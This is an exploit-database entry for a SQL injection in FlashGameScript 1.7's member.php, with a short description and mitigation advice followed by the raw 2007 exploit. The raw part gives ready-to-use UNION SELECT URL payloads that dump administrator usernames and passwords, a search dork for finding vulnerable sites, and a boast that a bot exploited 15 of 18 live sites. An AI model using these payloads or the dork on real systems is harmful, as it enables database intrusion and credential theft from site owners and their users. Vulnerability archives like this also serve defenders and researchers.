FlashGameScript - exploit.company

vendor:

FlashGameScript

by:

Xenduer77

5.5

CVSS

MEDIUM

SQL Injection

CWE

Product Name: FlashGameScript

Affected Version From: 1.7

Affected Version To: 1.7

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

FlashGameScript <= 1.7 (member.php)($user) SQL-Injection Exploit

This exploit allows an attacker to execute arbitrary SQL queries through the 'user' parameter in the 'member.php' file of FlashGameScript versions 1.7 and prior. The parameter is passed straight to the query without being filtered, allowing the attacker to manipulate the query and extract sensitive information from the database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Also, using prepared statements or parameterized queries can prevent SQL injection attacks.

Source

Exploit-DB raw data:

###############################################
### FlashGameScript <= 1.7 (member.php)($user) SQL-Injection Exploit
###############################################
### Vulnrability Discovered By: Xenduer77
### ---July 7th, 2007
###############################################

{$user} Is passed straight to the query without being filtered.

###############################################
SQL-INJECTION:
###############################################

For Version 1.7:
-------
http://whatever.com/index.php?func=member&user='+union+select+0,0,0,0,0,0,0,0,0,0,username,password,0,0,0,0,0,user_type+from+members+where+user_type=2/*

Prior To 1.7:
-------
http://whatever.com/index.php?func=member&user='+union+select+0,0,0,0,0,0,0,0,0,0,username,password,0,0,0,0,user_type+from+members+where+user_type=2/*

 ###Tested by a bot on 18 sites, 15 were exploited.

###############################################

Dork: "Powered by FlashGameScript"

###############################################

# milw0rm.com [2007-07-08]